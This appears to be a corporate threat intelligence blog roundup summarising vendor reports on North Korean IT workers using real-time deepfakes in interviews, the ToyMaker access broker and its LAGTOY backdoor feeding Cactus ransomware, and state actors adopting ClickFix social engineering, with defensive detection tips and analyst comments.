CTI Roundup: Deepfakes, ToyMaker IAB, and ClickFix

In this week’s roundup, Tanium’s CTI team examines how North Korean IT workers are reportedly using real-time deepfakes to access organizations. Next up, the team investigates an initial access broker (IAB) known as ToyMaker. Finally, we wrap up with an overview of how several state-sponsored groups are leveraging the ClickFix social engineering tactic to deliver malware.

Threat actors use real-time deepfakes to achieve access

According to a new Palo Alto report, North Korean IT workers are believed to be using real-time deepfake technology to gain their way into organizations via remote work positions.

Several reports have come out recently regarding the increase in candidates using real-time deepfakes during job interviews. North Korean threat actors specifically have “consistently demonstrated a significant interest in identity manipulation techniques.”

Just two years ago, Palo Alto reported how North Korean actors were creating synthetic identities with the help of compromised personal information. These North Korean IT workers have continued advancing their tactics, techniques, and procedures (TTPs), now implementing real-time deepfake technology into the mix. This enables a single IT worker to interview for one position using multiple deepfake personas and helps them avoid being identified.

How easy is it to create a deepfake identity?

A researcher at Palo Alto with no prior image manipulation experience and limited deepfake knowledge decided to create a synthetic identity for job interviews. Using a five-year-old computer, the team created a profile in just 70 minutes, highlighting how easy it would be for threat actors of all skill levels to do the same.

To do this, the individual used single images generated by a site called thispersonnotexist[.]org. The site “permits the use of generated faces for personal and commercial purposes, as well as free tools for deepfakes.”

Using these images, they were able to generate several identities. All this person would need to do is change their clothes and background image to really differentiate the different personas.

They tried again, this time with more time, a better GPU, and a higher resolution of the same exact process, which created even more convincing results.

[Read also: I almost fell for this online scam—Why even tech pros can be taken]

How to spot real-time video deepfakes

Palo Alto pointed out a few shortcomings in deepfake systems that defenders can use to identify fake personas, including:

• Rapid head movements
• A poorly constructed face occurs when a hand or other object moves in front of it
• Sudden changes in lighting
• Delays in mouth movement and speech

Analyst comments from Tanium’s Cyber Threat Intelligence team

The researchers at Palo Alto attempted to create real-time deepfakes using only readily available tools and cheap hardware to demonstrate how easy it is for actors to create believable identities. The key takeaway is that creating fake identities is surprisingly easy.

The constant evolution of this threat, coupled with consistent improvements to AI and deepfake technology, makes attacks exceedingly difficult to detect. As Palo Alto notes, close collaboration between HR and security is critical for identifying and protecting against this evolving threat.

It’s important to watch the videos created by Palo Alto in the report to fully understand how convincing these deepfakes can be.

ToyMaker IAB works with double extortion gangs

Cisco Talos shared details of an initial access broker (IAB) named ToyMaker. This financially motivated actor targets vulnerable systems, deploys a custom backdoor called LAGTOY, and attempts to extract credentials.

Cisco Talos observed ToyMaker handing this access over to the Cactus double extortion ransomware gang.

How does ToyMaker work?

Within a week of initial compromise, ToyMaker engaged in reconnaissance followed by credential theft and backdoor deployment. This was followed by a lull in activity before Cactus entered the picture, using credentials that ToyMaker had stolen.

ToyMaker will often exploit known vulnerabilities to get into an organization and begin performing reconnaissance. After running some basic commands for discovery, the actor will initiate an SSH listener. The endpoint can then receive a connection from a different infected host, creating a binary named “sftp-server.exe”—the SFTP server module of OpenSSH. This executable can then reach out to download the Magnet RAM Capture executable.

Magnet RAM Capture is a free forensics tool often used to get a memory dump from the host. ToyMaker can then use this to extract credentials. The actor will then use their own custom reverse shell implant, LAGTOY, to establish persistence on the system.

[Read also: 15 cybersecurity terms you (and your CEO) ought to know by now]

What is the LAGTOY backdoor?

LAGTOY is a simple implant used by ToyMaker and is also tracked as “HOLERUN.”

The backdoor periodically contacts the C2, looking for commands to execute on the infected device. It contains anti-debugging checks and is designed to run as a service under the name “WmiPrvSV.” The malware’s C2 IP and port are both hardcoded. LAGTOY uses time-based logic for its execution, which is believed to be unique to this family.

Cactus and ToyMaker

After receiving access from ToyMaker, Cactus started carrying out network scans, enumerating endpoints, and clearing their tracks. The credentials obtained by ToyMaker enabled Cactus to access several systems and exfiltrate files.

This actor also used several remote admin tools for access, created reverse shells via OpenSSH, removed access to the SSH private key file, created new user accounts, executed commands to disable security tools, and used Metasploit injected binaries.

Analyst comments from Tanium’s Cyber Threat Intelligence team

IAB actors can sometimes be overlooked because they do not carry out complex attack chains. Cisco Talos’ analysis and timeline reveal the important role that IABs play in the threat landscape by making it easier for other actors to carry out their plans.

This example serves as a reminder about how important precautions like vulnerability patching and rotating compromised credentials can be.

State-sponsored hackers use the ClickFix social engineering tactic

According to Proofpoint, several state-sponsored groups now leverage the ClickFix social engineering tactic to deliver malware. This technique is “replacing the installation and execution stages in existing infection chains” for these actors.

Other recent ClickFix attacks to know about:

• Silk Typhoon, Fake Ransom Notes, and ClickFix
• Vortax Spreads Infostealer Malware, Linux Malware Uses Emojis to Execute Commands

Proofpoint observed several nation-state actors from North Korea, Iran, and Russia using this technique between late 2024 and early 2025.

TA427 aka Kimsuky (North Korea)

This North Korean threat actor, also known as Kimsuky, was observed by Proofpoint in January and February 2025 targeting organizations in the think tank sector. These attacks used an infection chain using the ClickFix technique that the group had not previously used.

The group started the attacks by emailing the victims and starting a conversation to build trust. The actor then guided the victim to a site where they were asked to copy, paste, and run a PowerShell command that supposedly would register their device as part of the lure. Proofpoint notes that one chain failed to receive additional payloads, while another similar instance of the attack used a multistage chain to execute several scripts, resulting in QuasarRAT.

TA450 aka MuddyWater (Iran)

In November 2024, Proofpoint observed this actor, also known as MuddyWater, using ClickFix.

The attack started with a phishing email that pretended to be a security update from Microsoft. This ultimately tricked the victim into running PowerShell with admin privileges, copying, pasting, and executing a command within the email.

TA422 and UNK_RemoteRogue (Russia)

In December 2024, Proofpoint observed a Russian actor sending messages to two organizations without a subject line that were likely to abuse compromised Zimbra servers for infrastructure.

These emails contained a link spoofing Microsoft Office and invited the recipient to visit the site. The site also spoofed a Word document and instructed the victim to copy and run code from it. This site took it a step further by including a YouTube link that showed how to run PowerShell.

[Read also: Here’s another real-world example of TA422 in action]

Analyst comments from Tanium’s Cyber Threat Intelligence team

The ClickFix technique is now very common among cybercriminal actors, making Proofpoint’s discovery of it being used by nation-state actors quite noteworthy.

It remains to be seen whether more nation-state actors will start to adopt this technique, but the fact that these actors only used the technique once may indicate a trial period of sorts.

It’s also worth noting that the ClickFix technique is becoming increasingly popular as the months go by, making it important to educate users on some of the telltale signs.

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.